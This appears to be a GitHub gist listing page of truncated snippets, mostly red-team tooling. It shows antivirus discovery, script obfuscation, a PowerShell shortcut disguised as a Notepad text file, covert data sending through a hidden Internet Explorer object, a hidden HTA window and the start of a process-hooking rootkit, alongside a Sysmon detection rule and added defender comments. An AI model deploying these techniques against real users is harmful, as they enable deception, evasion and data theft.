I hereby claim:
- I am leoloobeek on github.
- I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
- I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#====================================# | |
# Extract Wi-Fi Credentials # | |
# greg . foss @ owasp . org # | |
# v0.1 -- July, 2017 # | |
#====================================# | |
# Licensed under the MIT License | |
<# |
' Returns the Base64 text form of sText by round-tripping it through an
' MSXML element whose data type is set to "bin.base64".
' NOTE(review): a bin.base64 node normally carries binary data; the caller is
' outside this view, so confirm what type sText actually has.
Function Base64Encode(sText)
    Dim xmlDoc, tmpNode
    Set xmlDoc = CreateObject("Microsoft.XMLDOM")
    Set tmpNode = xmlDoc.createElement("tmp")
    ' Once the node is typed as bin.base64, its Text property is the encoded form
    ' of whatever was stored in NodeTypedValue.
    With tmpNode
        .DataType = "bin.base64"
        .NodeTypedValue = sText
        Base64Encode = .Text
    End With
End Function
' Binds to the WMI namespace ROOT\SecurityCenter2 on the local machine (".")
' with impersonationLevel=impersonate.
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
' Selects every AntiVirusProduct instance in that namespace; what is done with
' "items" is outside this view.
' Defender note: a script host querying SecurityCenter2 for AntiVirusProduct is
' security-product discovery and is worth surfacing through WMI activity logging.
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") |
' Require every variable to be declared before it is used.
Option Explicit | |
' Script-level variables; the lines visible on this page assign only
' oFilesToEncode, oEncoder, i and oFSO.
dim oEncoder, oFilesToEncode, file, sDest | |
dim sFileOut, oFile, oEncFile, oFSO, i | |
dim oStream, sSourceFile | |
' The command-line arguments are the work list (the variable name suggests
' paths of files to encode; confirm against the loop body, which is cut off here).
set oFilesToEncode = WScript.Arguments | |
' Scripting.Encoder is the Windows Script Encoder COM object. Its output is an
' obfuscated script, not an encrypted one, so encoded scripts found during
' triage should be decoded and read rather than treated as opaque.
set oEncoder = CreateObject("Scripting.Encoder") | |
For i = 0 to oFilesToEncode.Count - 1 | |
set oFSO = CreateObject("Scripting.FileSystemObject") |
Call X() | |
End Function | |
' Remote host and port settings. "x.x.x.x" is a placeholder left by the author;
' how the two values are consumed is outside this view.
' NOTE(review): RPORT is stored as a string, not a number; confirm the consumer expects that.
Dim RHOST: RHOST = "x.x.x.x" | |
Dim RPORT: RPORT = "8999" | |
Function Base64ToStream(b) | |
Dim enc, length, ba, transform, ms | |
Set enc = CreateObject("System.Text.ASCIIEncoding") | |
length = enc.GetByteCount_2(b) |
# Builds a .lnk file on the current user's Desktop through the WScript.Shell COM object.
$Shell = New-Object -ComObject ("WScript.Shell") | |
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk") | |
# The shortcut launches powershell with an inline -command; the command text is
# elided ("....." ) on the page. "-W 1" is presumably the abbreviated -WindowStyle
# switch (confirm).
$ShortCut.Arguments = " -W 1 -command ....." | |
$ShortCut.TargetPath = "powershell" | |
# Icon and description are taken from Notepad / "Text Document", so what the user
# sees does not match what the shortcut runs.
# Defender note: a .lnk whose TargetPath is a script interpreter while its
# IconLocation points at an unrelated binary is a mismatch worth alerting on;
# triage should read the Arguments field of the shortcut, not its icon or description.
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0"; | |
$ShortCut.Description = "Type: Text Document"; | |
# Save() is the call that writes the .lnk to disk.
$ShortCut.Save() |
// sample function that takes in a destination server, POST data, and custom HTTP request headers | |
private string SendData(string dst, byte[] postData, string customHeaders) | |
{ | |
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
object IE = Activator.CreateInstance(com_type); | |
object[] falseArr = new object[] { false }; | |
object[] trueArr = new object[] { true }; | |
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
<html> | |
<head> | |
<script language="JScript"> | |
// HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try | |
{ |
<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS--> | |
<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus--> | |
<!-- Include rule: record an ImageLoad event whenever the loaded module path ends with ieproxy.dll. The exclude rule that follows lists Internet Explorer binaries by path. NOTE(review): presumably the pair is meant to surface non-browser processes that load ieproxy.dll, for example when driving Internet Explorer over COM; confirm against the rest of the configuration, which is cut off on this page. -->
<ImageLoad onmatch="include"> | |
<ImageLoaded condition="end with">ieproxy.dll</ImageLoaded> | |
</ImageLoad> | |
<ImageLoad onmatch="exclude"> | |
<Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image> | |
<Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image> | |
<Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image> | |
<Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image> |
#include <windows.h> | |
#include <stdio.h> | |
// File-scope function pointer. NOTE(review): presumably holds the address of
// CreateProcessW for the hooking code described in the linked post; confirm
// against the code that assigns it, which is outside this view.
FARPROC fpCreateProcessW; | |
// File-scope single byte. NOTE(review): presumably the original byte saved
// before it is overwritten, so it can be restored later; confirm.
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |